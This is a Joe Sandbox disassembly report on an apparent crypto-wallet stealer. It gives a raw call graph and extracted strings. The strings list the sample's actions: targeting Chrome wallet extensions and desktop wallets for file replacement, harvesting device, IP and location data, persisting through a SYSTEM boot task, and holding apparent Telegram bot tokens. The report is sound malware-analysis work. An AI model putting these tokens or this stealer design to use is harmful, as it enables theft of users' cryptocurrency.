__std_fs_open_handle 2 API calls 44406->44407 44408 7ff643f5e80d 44407->44408 44409 7ff643f5e813 44408->44409 44412 7ff643f5e770 __std_fs_open_handle 2 API calls 44408->44412 44418 7ff643f5e9bb 44408->44418 44410 7ff643f5e816 SetFileInformationByHandle 44409->44410 44419 7ff643f5e83c 44409->44419 44411 7ff643f5e8b8 GetLastError 44410->44411 44410->44419 44413 7ff643f5e8c5 44411->44413 44412->44409 44413->44419 44466 7ff643f5e03c SetFileInformationByHandle GetLastError SetFileInformationByHandle GetLastError 44413->44466 44415 7ff643f5e849 44421 7ff643f5e884 CloseHandle 44415->44421 44416 7ff643f5e892 44417 7ff643f62770 codecvt 8 API calls 44416->44417 44422 7ff643f5e8a2 44417->44422 44468 7ff643f71774 47 API calls 2 library calls 44418->44468 44419->44415 44419->44416 44419->44421 44420 7ff643f5e8e3 44420->44419 44425 7ff643f5e8f5 GetFileInformationByHandleEx 44420->44425 44421->44416 44421->44418 44422->43069 44427 7ff643f5e93b 44425->44427 44428 7ff643f5e90e 44425->44428 44429 7ff643f5e942 SetFileInformationByHandle 44427->44429 44437 7ff643f5e91b 44427->44437 44431 7ff643f5e912 GetLastError 44428->44431 44429->44428 44432 7ff643f5e95e 44429->44432 44431->44437 44433 7ff643f5e925 CloseHandle 44437->44416 44437->44433 44442->43016 44443->43048 44451 7ff643f3f023 44450->44451 44452 7ff643f3efdf memcpy_s 44450->44452 44461 7ff643f43fa0 50 API calls 6 library calls 44451->44461 44452->44375 44454 7ff643f3f039 44454->44375 44456 7ff643f5e339 GetLastError 44455->44456 44459 7ff643f5e32d 44455->44459 44457 7ff643f5e34a 44456->44457 44456->44459 44458 7ff643f5e440 66 API calls 44457->44458 44458->44459 44459->44375 44460->44368 44461->44454 44462->44385 44465->44402 44466->44420 44470->43073 44471->43089 44950 7ff643f2a870 44949->44950 44951 7ff643f5e0b4 __std_fs_code_page 48 API calls 44950->44951 44952 7ff643f2a888 44951->44952 44953 7ff643f23ab0 52 API calls 44952->44953 44954 7ff643f2a8ad 44953->44954 44955 7ff643f2ac76 44954->44955 44956 7ff643f2a8db 44954->44956 44957 7ff643f24d50 54 API calls 44955->44957 44958 7ff643f2a918 messages 44956->44958 44959 7ff643f2ac89 44956->44959 44957->44959 44961 7ff643f2ac8f 44958->44961 44962 7ff643f255a0 66 API calls 44958->44962 44964 7ff643f2ac9f 44958->44964 44967 7ff643f2abb5 44958->44967 44968 7ff643f24f80 52 API calls 44958->44968 44969 7ff643f2aca5 44958->44969 44971 7ff643f2acab 44958->44971 44974 7ff643f44160 50 API calls 44958->44974 44991 7ff643f23f60 44958->44991 45008 7ff643f47d80 50 API calls 4 library calls 44958->45008 44960 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 44959->44960 44960->44961 44963 7ff643f24d50 54 API calls 44961->44963 44962->44958 44963->44964 44965 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 44964->44965 44965->44969 44966 7ff643f62770 codecvt 8 API calls 44970 7ff643f2ac59 44966->44970 44967->44966 44968->44958 44972 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 44969->44972 45009 7ff643f24c60 53 API calls 3 library calls 44971->45009 44972->44971 44974->44958 44992 7ff643f23f8a 44991->44992 44993 7ff643f5e0b4 __std_fs_code_page 48 API calls 44992->44993 45008->44958 45373 7ff643f59ded 45372->45373 45375 7ff643f59df7 messages 45372->45375 45374 7ff643f62a38 std::_Facet_Register 50 API calls 45373->45374 45374->45375 45375->43810 45376->43824 45388 7ff643f58ce3 45389 7ff643f62a38 std::_Facet_Register 50 API calls 45388->45389 45390 7ff643f58ced 45389->45390 45391 7ff643f62a38 std::_Facet_Register 50 API calls 45390->45391 45392 7ff643f58d1b 45391->45392 45395 7ff643f5a300 45392->45395 45394 7ff643f58d41 45394->45394 45396 7ff643f5a3c2 45395->45396 45397 7ff643f5a332 45395->45397 45396->45394 45398 7ff643f62a38 std::_Facet_Register 50 API calls 45397->45398 45399 7ff643f5a34a 45398->45399 45400 7ff643f57910 50 API calls 45399->45400 45401 7ff643f5a367 45400->45401 45402 7ff643f57af0 50 API calls 45401->45402 45403 7ff643f5a375 45402->45403 45404 7ff643f5a300 50 API calls 45403->45404 45404->45396 45405 7ff643f3d3f0 45407 7ff643f3d436 45405->45407 45414 7ff643f40b20 45407->45414 45408 7ff643f3d447 45410 7ff643f3d46c 45408->45410 45424 7ff643f3dd80 45408->45424 45409 7ff643f3d4bc 45410->45409 45431 7ff643f649c0 RtlPcToFileHeader RaiseException 45410->45431 45412 7ff643f3d53e 45415 7ff643f40b7f 45414->45415 45419 7ff643f40b4a 45414->45419 45417 7ff643f41160 10 API calls 45415->45417 45421 7ff643f40b8d 45415->45421 45416 7ff643f40b6e 45416->45408 45417->45421 45418 7ff643f40d12 45418->45408 45419->45416 45432 7ff643f649c0 RtlPcToFileHeader RaiseException 45419->45432 45421->45418 45433 7ff643f649c0 RtlPcToFileHeader RaiseException 45421->45433 45423 7ff643f40dd3 45425 7ff643f3dd98 45424->45425 45429 7ff643f3dda4 memcpy_s 45424->45429 45425->45410 45426 7ff643f3ddb5 memcpy_s 45426->45410 45427 7ff643f3deee 45427->45426 45430 7ff643f6c520 _fread_nolock 63 API calls 45427->45430 45428 7ff643f6c520 _fread_nolock 63 API calls 45428->45429 45429->45426 45429->45427 45429->45428 45430->45426 45431->45412 45432->45421 45433->45423 45434 7ff643f3d200 45435 7ff643f3d25d 45434->45435 45438 7ff643f3d337 45434->45438 45436 7ff643f40b20 10 API calls 45435->45436 45437 7ff643f3d284 45436->45437 45441 7ff643f3d2b4 45437->45441 45445 7ff643f3db30 45437->45445 45455 7ff643f649c0 RtlPcToFileHeader RaiseException 45438->45455 45439 7ff643f3d30d 45441->45439 45456 7ff643f649c0 RtlPcToFileHeader RaiseException 45441->45456 45443 7ff643f3d3e6 45446 7ff643f3db63 45445->45446 45447 7ff643f3fdd0 78 API calls 45446->45447 45454 7ff643f3dbbb 45446->45454 45449 7ff643f3db86 45447->45449 45448 7ff643f62770 codecvt 8 API calls 45450 7ff643f3dc29 45448->45450 45451 7ff643f3dba6 45449->45451 45452 7ff643f6c858 75 API calls 45449->45452 45449->45454 45450->45441 45451->45454 45457 7ff643f6be50 45451->45457 45452->45451 45454->45448 45455->45441 45456->45443 45458 7ff643f6be79 45457->45458 45459 7ff643f6be64 45457->45459 45458->45459 45461 7ff643f6be7e 45458->45461 45466 7ff643f71674 11 API calls memcpy_s 45459->45466 45463 7ff643f6db84 50 API calls 45461->45463 45462 7ff643f6be69 45467 7ff643f6cd10 47 API calls _invalid_parameter_noinfo 45462->45467 45464 7ff643f6be74 45463->45464 45464->45454 45466->45462 45467->45464 45468 7ff643f68635 45480 7ff643f693f8 45468->45480 45481 7ff643f76f84 _Getctype 47 API calls 45480->45481 45482 7ff643f69401 45481->45482 45485 7ff643f71774 47 API calls 2 library calls 45482->45485 45486 7ff643f400c0 45487 7ff643f41370 58 API calls 45486->45487 45488 7ff643f40188 45487->45488 45489 7ff643f41080 58 API calls 45488->45489 45490 7ff643f401ba 45489->45490 45496 7ff643f40f70 45490->45496 45492 7ff643f40262 45493 7ff643f40234 45493->45492 45505 7ff643f649c0 RtlPcToFileHeader RaiseException 45493->45505 45495 7ff643f402c4 45497 7ff643f41069 45496->45497 45498 7ff643f40f91 45496->45498 45497->45493 45506 7ff643f60c1c 45498->45506 45502 7ff643f40fbb 45513 7ff643f43430 86 API calls 5 library calls 45502->45513 45504 7ff643f40fd9 45504->45493 45505->45495 45507 7ff643f60c62 45506->45507 45508 7ff643f40fa1 45507->45508 45514 7ff643f6c8f0 75 API calls ProcessCodePage 45507->45514 45508->45497 45512 7ff643f3fec0 47 API calls codecvt 45508->45512 45510 7ff643f60cb0 45510->45508 45511 7ff643f68fe0 76 API calls 45510->45511 45511->45508 45512->45502 45513->45504 45514->45510 45515 7ff643f46930 45516 7ff643f46b6e 45515->45516 45520 7ff643f4698a 45515->45520 45552 7ff643f462a0 50 API calls 2 library calls 45516->45552 45518 7ff643f46b69 45551 7ff643f22370 50 API calls 3 library calls 45518->45551 45520->45518 45521 7ff643f469e8 45520->45521 45522 7ff643f46a11 45520->45522 45528 7ff643f469d6 45520->45528 45521->45518 45524 7ff643f469f5 45521->45524 45525 7ff643f62a38 std::_Facet_Register 50 API calls 45522->45525 45523 7ff643f693f8 __GSHandlerCheck_EH 47 API calls 45532 7ff643f46b0f 45523->45532 45527 7ff643f62a38 std::_Facet_Register 50 API calls 45524->45527 45525->45528 45527->45528 45528->45532 45534 7ff643f48870 45528->45534 45529 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 45530 7ff643f46b80 45529->45530 45531 7ff643f46a62 45531->45523 45531->45532 45533 7ff643f46b38 messages 45531->45533 45532->45529 45532->45533 45535 7ff643f62a38 std::_Facet_Register 50 API calls 45534->45535 45536 7ff643f488b2 45535->45536 45537 7ff643f3f4e0 std::_Throw_Cpp_error 50 API calls 45536->45537 45538 7ff643f488d4 45537->45538 45539 7ff643f3f4e0 std::_Throw_Cpp_error 50 API calls 45538->45539 45540 7ff643f488e1 45539->45540 45541 7ff643f3f4e0 std::_Throw_Cpp_error 50 API calls 45540->45541 45542 7ff643f488ee 45541->45542 45553 7ff643f691b0 45542->45553 45545 7ff643f4892b 45547 7ff643f62770 codecvt 8 API calls 45545->45547 45546 7ff643f4894c 45571 7ff643f5ecb0 53 API calls 2 library calls 45546->45571 45549 7ff643f48938 45547->45549 45549->45531 45551->45516 45552->45531 45554 7ff643f691e7 45553->45554 45555 7ff643f691d0 45553->45555 45572 7ff643f6914c 45554->45572 45579 7ff643f71674 11 API calls memcpy_s 45555->45579 45559 7ff643f691d5 45580 7ff643f6cd10 47 API calls _invalid_parameter_noinfo 45559->45580 45560 7ff643f691fa CreateThread 45562 7ff643f6922a GetLastError 45560->45562 45563 7ff643f48923 45560->45563 45581 7ff643f715e8 11 API calls 2 library calls 45562->45581 45563->45545 45563->45546 45565 7ff643f69237 45566 7ff643f69246 45565->45566 45567 7ff643f69240 CloseHandle 45565->45567 45568 7ff643f69255 45566->45568 45569 7ff643f6924f FreeLibrary 45566->45569 45567->45566 45570 7ff643f78340 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 45568->45570 45569->45568 45570->45563 45573 7ff643f787c4 memcpy_s 11 API calls 45572->45573 45574 7ff643f6916e 45573->45574 45575 7ff643f78340 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 45574->45575 45576 7ff643f69178 45575->45576 45577 7ff643f6917d 45576->45577 45578 7ff643f69181 GetModuleHandleExW 45576->45578 45577->45560 45577->45563 45578->45577 45579->45559 45580->45563 45581->45565 45582 7ff643f25060 45583 7ff643f25094 45582->45583 45584 7ff643f3f080 50 API calls 45583->45584 45599 7ff643f25226 messages 45583->45599 45586 7ff643f250ca 45584->45586 45585 7ff643f62770 codecvt 8 API calls 45587 7ff643f25244 45585->45587 45588 7ff643f44160 50 API calls 45586->45588 45589 7ff643f250fc 45588->45589 45590 7ff643f23d40 50 API calls 45589->45590 45591 7ff643f2510a messages 45590->45591 45593 7ff643f2525d 45591->45593 45605 7ff643f5e3cc 45591->45605 45595 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 45593->45595 45597 7ff643f25263 45595->45597 45596 7ff643f251a4 45598 7ff643f255a0 66 API calls 45596->45598 45601 7ff643f2519e 45596->45601 45598->45601 45599->45585 45600 7ff643f2516b 45600->45601 45602 7ff643f5e38c 2 API calls 45600->45602 45601->45599 45603 7ff643f25258 45601->45603 45602->45600 45604 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 45603->45604 45604->45593 45606 7ff643f5e3ea FindClose 45605->45606 45607 7ff643f5e3f7 FindFirstFileExW 45605->45607 45606->45607 45608 7ff643f5e438 45606->45608 45609 7ff643f5e422 GetLastError 45607->45609 45610 7ff643f25165 45607->45610 45613 7ff643f71774 47 API calls 2 library calls 45608->45613 45609->45610 45610->45596 45610->45600 45614 7ff643f6d340 45615 7ff643f6d374 45614->45615 45623 7ff643f6d389 45614->45623 45641 7ff643f71674 11 API calls memcpy_s 45615->45641 45617 7ff643f6d379 45642 7ff643f6cd10 47 API calls _invalid_parameter_noinfo 45617->45642 45620 7ff643f6d384 45621 7ff643f62770 codecvt 8 API calls 45620->45621 45622 7ff643f6d4d3 45621->45622 45633 7ff643f6d4b8 45623->45633 45634 7ff643f7d85c 45623->45634 45628 7ff643f6d66f 45630 7ff643f6cd60 _invalid_parameter_noinfo_noreturn 17 API calls 45628->45630 45632 7ff643f6d684 45630->45632 45633->45620 45643 7ff643f71674 11 API calls memcpy_s 45633->45643 45635 7ff643f7d86b 45634->45635 45636 7ff643f6d5d2 45634->45636 45656 7ff643f71f64 EnterCriticalSection 45635->45656 45644 7ff643f7ca00 45636->45644 45641->45617 45642->45620 45643->45620 45645 7ff643f7ca09 45644->45645 45646 7ff643f6d5e3 45644->45646 45657 7ff643f71674 11 API calls memcpy_s 45645->45657 45646->45628 45650 7ff643f7ca30 45646->45650 45648 7ff643f7ca0e 45658 7ff643f6cd10 47 API calls _invalid_parameter_noinfo 45648->45658 45651 7ff643f7ca39 45650->45651 45655 7ff643f6d5f4 45650->45655 45659 7ff643f71674 11 API calls memcpy_s 45651->45659 45653 7ff643f7ca3e 45660 7ff643f6cd10 47 API calls _invalid_parameter_noinfo 45653->45660 45655->45628 45655->45633 45657->45648 45658->45646 45659->45653 45660->45655
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_fs_code_page$ErrorLastWindow$CleanupConsoleCreateEnumFileModuleNameProcessesShowSnapshotStartupToolhelp32gethostname
                                                                                                                                                                                                                                                                                          • String ID: terminated successfully.$128CF4C4A59C494144DAA119829B936CB9188E7B9DEFDBD4C0493780A8F822BE$13374559388926377$13374561731521706$13374995715847847$13375049800588985$13375110241046665$13375110296496201$13375110310591214$13375110321620290$13375110331747787$13375110344191823$13375110354575865$13375110364515390$18750852BBA140FCF329F0B2F98ED961304CD00CFEE1A5FF44762B97F2CE9E2F$1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f$23.12.21$2CDA9B33DF3854077ED63B9E912DD676B1892A6CDD18DC59790C40799E92D71B$6442787215$6C086D45706F3CDD6696F63808255BDDE719EA09BA60CBC98CDFEB55C8E94AE2$7340678156$7427009775$7776586945:AAFQTT1AD04IUpOLlf1aziN70zm8frk2JnQ$7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o$7867603719:AAEHk7Xd_OIqLVzZCPZMe4dTduUoZLQ8y2Y$805CF202E4DF8532D12BE509DE6794904E1C5D1F9FD783FD1507ADE27DEEE8AA$928279468E812A7C237289C39C5EA79668D93AE33F533F0C2198516C379764B7$</b>$</code>$<all_urls>$<b>Device Name:</b> $<b>IP Address:</b> $<b>Location:</b> $<b>Wallets:</b><code>$AF7CBA694AB611FF172D667CA5504FEBFB024ABC1637F2C63B8D72D67BBA3F5A$All users: $C:\Program Files\Google\Chrome\Extensions$C:\Program Files\Google\Chrome\Extensions\aholpfdialjgjfhomihkjbmgjidlcdno$C:\Program Files\Google\Chrome\Extensions\bfnaelmomeimhlpmgjnjophhpkkoljpa$C:\Program Files\Google\Chrome\Extensions\efbglgofoippbgcjepnhiblaibcnclgk$C:\Program Files\Google\Chrome\Extensions\egjidjbpglichdcondbcbdnbeeppgdph$C:\Program Files\Google\Chrome\Extensions\fnjhmkhhmkbjkkabndcnnogagogbneec$C:\Program Files\Google\Chrome\Extensions\hnfanknocfeofbddgcijnmhnfnkdnaad$C:\Program Files\Google\Chrome\Extensions\lpfcbjknijpeeillifnkikgncikgfhdo$C:\Program Files\Google\Chrome\Extensions\mcohilncbfahbmgdjkbpemcciiolgcge$C:\Program Files\Google\Chrome\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn$C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f$C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip$C:\Program Files\Windows Media Player\graph$C:\Program Files\Windows Media Player\graph$C:\Program Files\Windows Media Player\graph\graph.exe$C:\Users\$CAC5B4D0F32AA7D73E8AF05E83A188D2ECBA2B6186D06E54306BC2427BBCD68C$D304D4787A15629A04F596502ED8CF8C6031BF683EB7BCFDB1819D5F02C9667B$D:\@dev\Extensions\Ronin (Extension)$Directory and all contents deleted successfully: $Directory and its contents removed.$Directory don't exist $E0DC88925F64449E216468A174ED51BFEE4E6510DF40B0D2B576B9F4DFFA468D$Extensions Installed$Extraction complete.$Extraction failed.$Failed to delete the directory.$Failed to initialize Winsock.$Failed to open file: $Failed to open output ZIP file: $Failed to terminate $Graph$No wallet installed previously...$Nothing found$Process $Processing: $There are no users. Exit$ZIP Local File Header signature not found in file.$ZIP file extracted successfully to $\AppData\Local\Google\Chrome\User Data$action.onClicked$activeTab$active_permissions$aholpfdialjgjfhomihkjbmgjidlcdno$api$bfnaelmomeimhlpmgjnjophhpkkoljpa$efbglgofoippbgcjepnhiblaibcnclgk$egjidjbpglichdcondbcbdnbeeppgdph$exists$fnjhmkhhmkbjkkabndcnnogagogbneec$found chrome profiles$graph.exe$hardware wallet replace finished$hash$hifafgmccdpekplomjjkcfgodnhcellj$hnfanknocfeofbddgcijnmhnfnkdnaad$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$lpfcbjknijpeeillifnkikgncikgfhdo$mcohilncbfahbmgdjkbpemcciiolgcge$nkbihfbeogaeaoehlefnkodbefgpgknn$remove_all$tabs$user =
                                                                                                                                                                                                                                                                                          • API String ID: 955434303-2808589617
                                                                                                                                                                                                                                                                                          • Opcode ID: 0457f4509c606a9562939b026e210298e0734733717b00db84526ec2b908503b
                                                                                                                                                                                                                                                                                          • Instruction ID: ab66f34e316949d037c044b572f71683ef4ffbc71a5993f573abd8f586cb862a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0457f4509c606a9562939b026e210298e0734733717b00db84526ec2b908503b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A273632291CBC694EB70FF34C8562E82361FB95388F505231D65C9BEEAEF689785D340
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page$Concurrency::cancel_current_taskEnvironmentFileFindFirstVariable
                                                                                                                                                                                                                                                                                          • String ID: Directory: $ $ (User: $ (User: None)$#$.exe$.lnk$.zip$Atomic$C:\Users\Public\Desktop\$Electrum$Exodus$Found directories:$Trazor Suite.exe$Trezor$Unzipped Hardware Wallet: $Wallet: $\resources\app\assets\index.js$\resources\app\assets\javascript.js$\resources\app\js\index.js$atomic.exe$remove$remove_all
                                                                                                                                                                                                                                                                                          • API String ID: 1414602396-4070211798
                                                                                                                                                                                                                                                                                          • Opcode ID: 239aae4cfd6310269bdea6b6649c7b404d330e1db1773a1de50ad786597a3b39
                                                                                                                                                                                                                                                                                          • Instruction ID: b87ea0af18bf79343ddfc1fb3080a4a4d9c23db3f0c29dea8477ebfd6d03c2c7
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 239aae4cfd6310269bdea6b6649c7b404d330e1db1773a1de50ad786597a3b39
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3E2A672A1CBC281EA60BB14E1453EE6361FB95794F505331EAAC57ADADF7DE080E700
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Variant$ClearInitStringUninitialize$_invalid_parameter_noinfo_noreturn$AllocConcurrency::cancel_current_taskErrorFreeLast$CreateFileInitializeInstanceModuleName
                                                                                                                                                                                                                                                                                          • String ID: Cannot create action.$Cannot create boot trigger.$Cannot get Root Folder pointer.$Cannot get action collection.$Cannot get trigger collection.$Current process path: $Failed to connect to Task Scheduler.$Failed to create TaskService instance.$Failed to create task definition.$Failed to get process path. Error: $Failed to initialize COM library.$Failed to register task. Error: $Failed to set executable path.$MyBootTask$QueryInterface call failed for IExecAction.$SYSTEM$Task successfully registered to run at boot with admin rights.
                                                                                                                                                                                                                                                                                          • API String ID: 1778526238-4048398458
                                                                                                                                                                                                                                                                                          • Opcode ID: a9829f7c9143c494a946ae2eece4fd15cc3df730564a76ae39a9946f5d666058
                                                                                                                                                                                                                                                                                          • Instruction ID: b6f140c465e3c2a644eafe9ee7468e66ac8fa99b0eca5a71de87db062fd78008
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9829f7c9143c494a946ae2eece4fd15cc3df730564a76ae39a9946f5d666058
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1E28232A1CBC681EA60BB25E4457AE6361EF857A4F104331DAAD93BD9DF7CD084E701
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page$Concurrency::cancel_current_task$__std_fs_convert_narrow_to_wide$ApisFile
                                                                                                                                                                                                                                                                                          • String ID: $C:\Users\$Chrome User Data directory not found.$File parse failed$No extensions found in preferences.$No pinned extensions found or 'pinned_extensions' is not an array.$Warning: Pinned extension is not a string, skipping.$\AppData\Local\Google\Chrome\User Data$\Extensions$\Preferences$\Secure Preferences$developer_mode$directory_iterator::directory_iterator$exists$extensions$file_size$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$macs$name$pinned_extensions$profile$protection$settings$status
                                                                                                                                                                                                                                                                                          • API String ID: 1036029176-3567150991
                                                                                                                                                                                                                                                                                          • Opcode ID: a98e0b5b1b96e2f6a73c87fbd0857c16def95f1e8b6730c45e48bbbff89afd87
                                                                                                                                                                                                                                                                                          • Instruction ID: 374ec589fde41f8bae1f2d9413a43796fdb383a72baaf1de42f4312da8047624
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a98e0b5b1b96e2f6a73c87fbd0857c16def95f1e8b6730c45e48bbbff89afd87
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC239262A1CBC282EAB4FB14E4563FA6361FB85740F405132DA8DA3ADADF7DD544DB00
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page
                                                                                                                                                                                                                                                                                          • String ID: Directories found:$\assets\js\popup.js$\assets\js\script.js$\js\script.js$\pass.js$\popup.js$\reset.js$\scripts\phrase.js$aholpfdialjgjfhomihkjbmgjidlcdno$bfnaelmomeimhlpmgjnjophhpkkoljpa$efbglgofoippbgcjepnhiblaibcnclgk$egjidjbpglichdcondbcbdnbeeppgdph$fnjhmkhhmkbjkkabndcnnogagogbneec$hifafgmccdpekplomjjkcfgodnhcellj$hnfanknocfeofbddgcijnmhnfnkdnaad$lpfcbjknijpeeillifnkikgncikgfhdo$mcohilncbfahbmgdjkbpemcciiolgcge$nkbihfbeogaeaoehlefnkodbefgpgknn
                                                                                                                                                                                                                                                                                          • API String ID: 4261731725-745990702
                                                                                                                                                                                                                                                                                          • Opcode ID: 8124582dcd90375a93976c69461b9c2fc965fb62fc5fa17613937e893bc11d1b
                                                                                                                                                                                                                                                                                          • Instruction ID: 9ba154ef18e27dca038eb7f7018a47d8f15b562d08f85aea9b539dd89f441427
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8124582dcd90375a93976c69461b9c2fc965fb62fc5fa17613937e893bc11d1b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4DD2A062F1CB8285FB40FB65D2023EC2361AB55798F005731DE6CA76DAEF79E584A340
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
